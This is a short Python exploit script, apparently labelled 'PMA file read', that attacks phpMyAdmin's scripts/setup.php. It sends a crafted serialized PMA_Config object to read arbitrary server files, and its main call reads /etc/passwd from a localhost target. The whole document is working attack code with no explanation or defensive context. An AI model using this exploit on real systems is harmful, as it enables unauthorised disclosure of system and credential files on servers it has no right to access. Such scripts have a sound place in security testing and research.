import requests

# PMA file read
# www-data


def attack(host,file):
    url = "http://"+host+"/scripts/setup.php"
    num = str(len(file))
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data ='action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:'+num+':"'+file+'";}'
    r = requests.post(url,data=data,headers=headers).text
    if "stat failed for" in r:
        return "fail"
    elif "not readable" in r:
        return "fail"
    else:
        ret = r[:-140]
        return ret


if __name__ == '__main__':
    print(attack("localhost:9080","/etc/passwd"))